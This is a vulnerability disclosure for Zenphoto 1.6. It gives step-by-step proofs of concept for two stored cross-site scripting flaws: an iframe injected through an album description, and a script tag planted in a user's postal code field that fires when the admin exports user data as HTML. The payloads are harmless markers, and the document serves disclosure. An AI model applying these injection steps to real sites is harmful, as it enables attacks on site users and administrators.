Zenphoto 1.6 Cross Site Scripting

Exploit Title: Zenphoto 1.6 - Multiple stored XSSApplication: Zenphoto-1.6 xss pocVersion: 1.6 Bugs:  XSSTechnology: PHPVendor URL: https://www.zenphoto.org/news/zenphoto-1.6/Software Link: https://github.com/zenphoto/zenphoto/archive/v1.6.zipDate of found: 01-05-2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================###XSS-1###steps: 1. create new album 2. write Album Description : <iframe src="https://14.rs"></iframe> 3. save and view album  http://localhost/zenphoto-1.6/index.php?album=new-album or http://localhost/zenphoto-1.6/=====================================================###XSS-2###steps: 1. go to user account and change user data (http://localhost/zenphoto-1.6/zp-core/admin-users.php?page=users)2.change postal code  as <script>alert(4)</script>3.if admin user information import as html , xss will triggerpoc video : https://youtu.be/JKdC980ZbLY